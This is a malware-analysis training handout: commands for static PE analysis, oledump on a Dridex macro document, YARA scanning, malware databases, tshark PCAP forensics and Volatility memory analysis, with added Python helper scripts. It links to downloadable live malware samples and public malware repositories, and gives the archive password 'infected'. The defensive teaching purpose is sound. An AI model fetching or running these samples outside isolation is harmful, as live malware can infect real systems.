Untitled

djtroby May 31st, 2017
############################
# Download the Analysis VM #
############################
https://infosecaddictsfiles.blob.core.windows.net/vms/InfoSecAddictsVM.zip
user: infosecaddicts
pass: infosecaddicts


- Log in to your Ubuntu system with the username 'malware' and the password 'malware'.

- After logging in, please open a terminal window and type the following commands:

cd Desktop/


- This is actual malware (remember to run it in a VM; the password to extract it is 'infected'):

cd /home/infosecaddicts/Desktop/
wget https://infosecaddictsfiles.blob.core.windows.net/files/malware-password-is-infected.zip --no-check-certificate
wget https://infosecaddictsfiles.blob.core.windows.net/files/analyse_malware.py --no-check-certificate

unzip malware-password-is-infected.zip
    infected

file malware.exe

mv malware.exe malware.pdf

file malware.pdf

mv malware.pdf malware.exe

hexdump -n 2 -C malware.exe

***What is '4d 5a' or 'MZ'?***
Reference:
http://www.garykessler.net/library/file_sigs.html


objdump -x malware.exe

strings malware.exe

strings --all malware.exe | head -n 6

strings malware.exe | grep -i dll

strings malware.exe | grep -i library

strings malware.exe | grep -i reg

strings malware.exe | grep -i hkey

strings malware.exe | grep -i hku

    - We didn't see anything like HKLM, HKCU or other registry type stuff

strings malware.exe | grep -i irc

strings malware.exe | grep -i join

strings malware.exe | grep -i admin

strings malware.exe | grep -i list


    - List of IRC commands: https://en.wikipedia.org/wiki/List_of_Internet_Relay_Chat_commands

sudo apt-get install -y python-pefile
     malware

vi analyse_malware.py

python analyse_malware.py malware.exe
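The checks above (file, hexdump of the first two bytes, objdump -x and the pefile-based analyse_malware.py) all read the same header fields. Added example, not the course's analyse_malware.py: a dependency-free Python parser that classifies a file by magic bytes (so the malware.exe / malware.pdf rename changes nothing), walks the DOS header to the PE signature and lists COFF fields and section names, flagging section names commonly left by packers. The packer name table is an assumption, and the input is a constructed minimal PE image when no path is given.

```python
import struct
import sys

# Magic-number table: what `file` and `hexdump -n 2 -C` are really looking at.
MAGIC = [(b"MZ", "MZ executable (PE/DOS)"), (b"%PDF", "PDF"),
         (b"\xD0\xCF\x11\xE0", "OLE2 compound file (.doc/.xls)"), (b"PK\x03\x04", "ZIP")]
# Section names left by common packers (assumed list; extend as needed).
PACKER_SECTIONS = {"UPX0": "UPX", "UPX1": "UPX", "UPX2": "UPX",
                   ".aspack": "ASPack", ".adata": "ASPack", ".petite": "Petite"}

def file_type(data):
    """Classify by leading bytes, ignoring the file extension entirely."""
    for magic, name in MAGIC:
        if data.startswith(magic):
            return name
    return "unknown"

def parse_pe(data):
    """Walk DOS header -> 'PE\\0\\0' signature -> COFF header -> section table."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]        # offset of the PE signature
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    # COFF header (20 bytes): Machine, NumberOfSections, TimeDateStamp, SymTab ptr,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    machine, nsect, ts, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    sections, off = [], e_lfanew + 24 + opt_size               # table follows the optional header
    for _ in range(nsect):
        if off + 40 > len(data):                               # truncated image: stop, do not crash
            break
        name, vsize, vaddr, rsize, raw_off = struct.unpack_from("<8sIIII", data, off)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "vsize": vsize, "vaddr": vaddr, "rsize": rsize, "raw_off": raw_off})
        off += 40                                              # IMAGE_SECTION_HEADER is 40 bytes
    packers = sorted({PACKER_SECTIONS[s["name"]] for s in sections if s["name"] in PACKER_SECTIONS})
    return {"machine": hex(machine), "timestamp": ts, "is_dll": bool(chars & 0x2000),
            "sections": sections, "packer": packers}

def build_sample_pe():
    """Constructed minimal PE image (not a real sample): DOS stub, no optional header, 2 sections."""
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)                       # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0x59000000, 0, 0, 0, 0x0102)      # i386, EXE, 32-bit
    sect = struct.pack("<8sIIIIIIHHI", b".text", 0x100, 0x1000, 0x200, 0x400, 0, 0, 0, 0, 0x60000020)
    sect += struct.pack("<8sIIIIIIHHI", b"UPX1", 0x300, 0x2000, 0x200, 0x600, 0, 0, 0, 0, 0xE0000020)
    return dos + b"PE\0\0" + coff + sect

if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pe()
    print(file_type(data))
    print(parse_pe(data))
```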


Building a Malware Scanner
--------------------------

mkdir ~/Desktop/malwarescanner

cd ~/Desktop/malwarescanner

wget https://github.com/jonahbaron/malwarescanner/archive/master.zip

unzip master.zip

cd malwarescanner-master/

python scanner.py -h

cat strings.txt

cat hashes.txt

mkdir ~/Desktop/malcode

cp ~/Desktop/malware.exe ~/Desktop/malcode

python scanner.py -H hashes.txt -D /home/infosecaddicts/Desktop/malcode/ strings.txt

cd ~/Desktop/
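scanner.py above checks every file under -D against a hash list (-H) and a strings list. As an added example that is not jonahbaron's scanner.py, here is the same idea in Python: chunked MD5/SHA-1/SHA-256 hashing, hash and string matching over a directory tree, and a constructed temporary corpus (one IRC-bot-like file, one benign file) so it runs offline; the list-file format (one indicator per line) is an assumption.

```python
import hashlib
import io
import os
import sys
import tempfile

def hash_stream(f):
    """MD5, SHA-1 and SHA-256 of a stream, read in 64 KiB chunks so big samples fit in memory."""
    digests = {name: hashlib.new(name) for name in ("md5", "sha1", "sha256")}
    for chunk in iter(lambda: f.read(1 << 16), b""):
        for d in digests.values():
            d.update(chunk)
    return {name: d.hexdigest() for name, d in digests.items()}

def hash_bytes(data):
    return hash_stream(io.BytesIO(data))

def hash_file(path):
    with open(path, "rb") as f:
        return hash_stream(f)

def load_list(path):
    """One indicator per line, like hashes.txt / strings.txt; blanks and '#' comments ignored."""
    with open(path) as f:
        return [line.strip() for line in f if line.strip() and not line.startswith("#")]

def scan_dir(directory, hash_list, string_list):
    """Map each flagged file to the reasons it matched: known hash and/or suspicious string."""
    known = {h.lower() for h in hash_list}
    needles = [s.encode() for s in string_list]
    hits = {}
    for root, _, files in os.walk(directory):
        for name in files:
            path = os.path.join(root, name)
            reasons = ["hash:" + algo for algo, hx in hash_file(path).items() if hx in known]
            with open(path, "rb") as f:
                blob = f.read()
            reasons += ["string:" + s.decode() for s in needles if s in blob]
            if reasons:
                hits[path] = sorted(reasons)
    return hits

def demo():
    """Constructed corpus: one IRC-bot-like file and one benign file; hash list seeded from the first."""
    d = tempfile.mkdtemp()
    bad = os.path.join(d, "bot.exe")
    with open(bad, "wb") as f:
        f.write(b"MZ\x90\x00" + b"JOIN #chan\x00PRIVMSG admin\x00")
    with open(os.path.join(d, "readme.txt"), "wb") as f:
        f.write(b"nothing suspicious here")
    hits = scan_dir(d, [hash_file(bad)["sha256"]], ["JOIN #", "PRIVMSG"])
    return {os.path.basename(p): r for p, r in hits.items()}

if __name__ == "__main__":
    # Usage: python scan.py hashes.txt strings.txt <dir>; with no arguments the demo corpus is scanned.
    if len(sys.argv) == 4:
        for path, why in scan_dir(sys.argv[3], load_list(sys.argv[1]), load_list(sys.argv[2])).items():
            print(path, why)
    else:
        print(demo())
```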



#####################################################
# Analyzing Macro Embedded Malware                  #
# Reference:                                        #
# https://jon.glass/analyzes-dridex-malware-p1/     #
#####################################################
cp ~/Desktop/

- Create a FREE account on:
https://malwr.com/account/signup/

- Grab the malware from:
https://malwr.com/analysis/MzkzMTk3MzBlZGQ2NDRhY2IyNTc0MGI5MWQwNzEwZmQ/

file ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin

cat ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin


sudo pip install olefile
     malware

mkdir ~/Desktop/oledump

cd ~/Desktop/oledump

wget http://didierstevens.com/files/software/oledump_V0_0_22.zip

unzip oledump_V0_0_22.zip

cp ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin .

mv f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin 064016.doc


-----------------------------------------------------------------------------------------------------------------------------------


sudo pip install olefile
     malware

mkdir ~/Desktop/oledump

cd ~/Desktop/oledump

wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/064016.zip

unzip 064016.zip
     infected

python oledump.py 064016.doc

python oledump.py 064016.doc -s A4 -v

- From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams.
- Three of the data streams are flagged as macros: A3:'VBA/Module1', A4:'VBA/Module2', A5:'VBA/ThisDocument'.


python oledump.py 064016.doc -s A5 -v

- As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.


python oledump.py 064016.doc -s A3 -v

- Look for "GVhkjbjv" and you should see:


- Take that long blob that starts with 636D and finishes with 653B and paste it in:
http://www.rapidtables.com/convert/number/hex-to-ascii.htm
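Pasting the blob into a web converter works once; this added Python example (not from the jon.glass write-up or the course) does the same job on the saved oledump -s A3 -v output: it joins VBA string concatenations, finds long hex runs and decodes the ones that come out as printable ASCII. The macro text inside it is constructed to mimic the GVhkjbjv pattern with a harmless payload; the real Dridex blob is not reproduced.

```python
import re
import sys

HEX_RUN = re.compile(r"(?:[0-9A-Fa-f]{2}){8,}")       # at least 8 bytes of contiguous hex pairs
CONCAT = re.compile(r'"\s*[&+]\s*(?:_\s*)?"')           # "abc" & _ <newline> "def"  ->  "abcdef"

# Constructed macro text (variable name from the course, payload is a benign echo).
SAMPLE_MACRO = '''Sub AutoOpen()
    Dim GVhkjbjv As String
    GVhkjbjv = "636D642E657865202F6320" & _
               "6563686F20646F6E653B"
    Call Shell(Decode(GVhkjbjv))
End Sub
'''

def join_vba_strings(source):
    """Collapse split string literals so a blob spread over several lines becomes one run."""
    return CONCAT.sub("", source)

def decode_hex_runs(source):
    """Return (offset, text) for every long hex run whose bytes decode to printable ASCII."""
    found = []
    for m in HEX_RUN.finditer(source):
        text = bytes.fromhex(m.group()).decode("ascii", "replace")
        if all(32 <= ord(c) < 127 or c in "\r\n\t" for c in text):
            found.append((m.start(), text))
    return found

def extract(source):
    """Join literals first, then decode; returns only the decoded strings in file order."""
    return [text for _, text in decode_hex_runs(join_vba_strings(source))]

if __name__ == "__main__":
    # Usage: python decode_macro_hex.py <saved oledump output>; with no argument the sample is used.
    src = open(sys.argv[1], errors="replace").read() if len(sys.argv) > 1 else SAMPLE_MACRO
    for s in extract(src):
        print(repr(s))
```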
##############
# Yara Ninja #
##############
sudo apt-get remove -y yara
     malware

wget https://github.com/plusvic/yara/archive/v3.4.0.zip

sudo apt-get -y install libtool
     malware

unzip v3.4.0.zip

cd yara-3.4.0

./bootstrap.sh

./configure

make

sudo make install
    malware

yara -v

cd ..

wget https://github.com/Yara-Rules/rules/archive/master.zip

unzip master.zip

cd ~/Desktop

yara rules-master/packer.yar malcode/malware.exe


Places to get more Yara rules:
------------------------------
https://malwareconfig.com/static/yaraRules/
https://github.com/kevthehermit/YaraRules
https://github.com/VectraThreatLab/reyara


Yara rule sorting script:
-------------------------
https://github.com/mkayoh/yarasorter


cd ~/Desktop/rules-master
for i in $( ls *.yar --hide=master.yar ); do echo include \"$i\";done > master.yar
cd ~/Desktop/
yara rules-master/master.yar malcode/malware.exe


Here is a 2 million sample malware DB created by Derek Morton that you can use to start your DB with:
http://derekmorton.name/files/malware_12-14-12.sql.bz2


Malware Repositories:
http://malshare.com/index.php
http://www.malwareblacklist.com/
http://www.virusign.com/
http://virusshare.com/
http://www.tekdefense.com/downloads/malware-samples/


###############################
# Creating a Malware Database #
###############################

Creating a malware database (sqlite)
------------------------------------
sudo apt-get install -y python-simplejson python-simplejson-dbg
    malware

wget https://malwarecookbook.googlecode.com/svn/trunk/4/4/avsubmit.py
wget https://infosecaddictsfiles.blob.core.windows.net/files/malware-password-is-infected.zip

unzip malware-password-is-infected.zip
    infected

python avsubmit.py --init

python avsubmit.py -f malware.exe -e


Creating a malware database (mysql)
-----------------------------------
- Step 1: Installing MySQL database
- Run the following command in the terminal:

sudo apt-get install mysql-server
     malware

- Step 2: Installing Python MySQLdb module
- Run the following command in the terminal:

sudo apt-get build-dep python-mysqldb
     malware

sudo apt-get install python-mysqldb
     malware

- Step 3: Logging in
- Run the following command in the terminal:

mysql -u root -p                    (set a password of 'malware')

- Then create one database by running the following command:

create database malware;

exit;

wget https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py

vi mal_to_db.py                     (fill in database connection information)

python mal_to_db.py -i

------- check it to see if the files table was created ------

mysql -u root -p
    malware

show databases;

use malware;

show tables;

describe files;

exit;

---------------------------------


- Now add the malicious file to the DB

python mal_to_db.py -f malware.exe -u


- Now check to see if it is in the DB

mysql -u root -p
    malware

use malware;

select id,md5,sha1,sha256,time FROM files;

quit;


#################
# PCAP Analysis #
#################
cd /home/infosecaddicts/Desktop/Browser\ Forensics

ls | grep pcap

perl chaosreader.pl suspicious-time.pcap

firefox index.html

cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)"

cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)" | awk '{print $4, $5, $6}' | sort | uniq -c | sort -nr

sudo tshark -i eth0 -r suspicious-time.pcap -qz io,phs
     malware


for i in session_00[0-9]*.www.html; do srcip=`cat "$i" | grep 'www:\ ' | awk '{print $2}' |  cut -d ':' -f1`; dstip=`cat "$i" | grep 'www:\ ' | awk '{print $4}' |  cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host";  done | sort -u


#############################
# PCAP Analysis with tshark #
#############################
(Note: the -R used below is the read filter of older tshark builds; current versions take the same filters with -Y "..." in a single pass, or -2 -R "..." in two-pass mode.)

tshark -r suspicious-time.pcap | grep 'NB.*20\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | sort -u

tshark -r suspicious-time.pcap | grep 'NB.*1e\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | sort -u

    (NetBIOS name suffix <20> is the file server service, <1e> is browser service elections.)

tshark -r suspicious-time.pcap arp | grep has | awk '{print $3," -> ",$9}' | tr -d '?'

tshark -r suspicious-time.pcap -Tfields -e "eth.src" | sort | uniq

tshark -r suspicious-time.pcap -R "browser.command==1" -Tfields -e "ip.src" -e "browser.server" | uniq

tshark -r suspicious-time.pcap -Tfields -e "eth.src" | sort | uniq

tshark -r suspicious-time.pcap -qz ip_hosts,tree

tshark -r suspicious-time.pcap -R "http.request" -Tfields -e "ip.src" -e "http.user_agent" | uniq

tshark -r suspicious-time.pcap -R "dns" -T fields -e "ip.src" -e "dns.flags.response" -e "dns.qry.name"


whois rapidshare.com.eyu32.ru

whois sploitme.com.cn


tshark -r suspicious-time.pcap -R http.request  -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}'

tshark -r suspicious-time.pcap -R http.request  -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' -e google -e 'honeynet.org'

tshark -r suspicious-time.pcap -qz http_req,tree

tshark -r suspicious-time.pcap -R "data-text-lines contains \"<script\"" -T fields -e frame.number -e ip.src -e ip.dst

tshark -r suspicious-time.pcap -R http.request  -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico'  | grep 10.0.3.15 | sed -e 's/\?[^cse].*/\?\.\.\./g'


######################################
# PCAP Analysis with forensicPCAP.py #
######################################
cd ~/Desktop
wget https://raw.githubusercontent.com/madpowah/ForensicPCAP/master/forensicPCAP.py

sudo easy_install cmd2
     malware

python forensicPCAP.py Browser\ Forensics/suspicious-time.pcap

ForPCAP >>> help


Prints stats about the PCAP:
ForPCAP >>> stat


Prints all DNS requests from the PCAP file. The id before each DNS request is the packet's id, which can be used with the "show" command:
ForPCAP >>> dns

ForPCAP >>> show


Prints all destination ports from the PCAP file. The id before each port is the packet's id, which can be used with the "show" command:
ForPCAP >>> dstports

ForPCAP >>> show


Prints the number of source IPs and stores them:
ForPCAP >>> ipsrc

ForPCAP >>> show


Prints the number of web requests and stores them:
ForPCAP >>> web

ForPCAP >>> show

Prints the number of mail requests and stores them:
ForPCAP >>> mail

ForPCAP >>> show

###################
# Memory Analysis #
###################
cd /home/infosecaddicts/Desktop/Banking\ Troubles/Volatility

python volatility
python volatility pslist -f ../hn_forensics.vmem
python volatility connscan2 -f ../hn_forensics.vmem
python volatility memdmp -p 888 -f ../hn_forensics.vmem
python volatility memdmp -p 1752 -f ../hn_forensics.vmem
                ***Takes a few min***
strings 1752.dmp | grep "^http://" | sort | uniq
strings 1752.dmp | grep "Ahttps://" | uniq -u
cd ..
foremost -i ../Volatility/1752.dmp -t pdf -o output/pdf2
cd /home/infosecaddicts/Desktop/Banking\ Troubles/foremost-1.5.7/output/pdf2/
cat audit.txt
cd pdf
ls
grep -i javascript *.pdf


cd /home/infosecaddicts/Desktop/Banking\ Troubles/foremost-1.5.7/output/pdf5/pdf
wget http://didierstevens.com/files/software/pdf-parser_V0_6_4.zip
unzip pdf-parser_V0_6_4.zip
python pdf-parser.py -s javascript --raw 00600328.pdf
python pdf-parser.py --object 11 00600328.pdf
python pdf-parser.py --object 1054 --raw --filter 00600328.pdf > malicious.js

cat malicious.js


*****Sorry - no time to cover javascript de-obfuscation today*****


cd /home/infosecaddicts/Desktop/Banking\ Troubles/Volatility/
python volatility files -f ../hn_forensics.vmem > files
cat files | less
python volatility malfind -f ../hn_forensics.vmem -d out
ls out/
python volatility hivescan -f ../hn_forensics.vmem
python volatility printkey -o 0xe1526748 -f ../hn_forensics.vmem Microsoft "Windows NT" CurrentVersion Winlogon
for file in $(ls *.dmp); do echo $file; strings $file | grep bankofamerica; done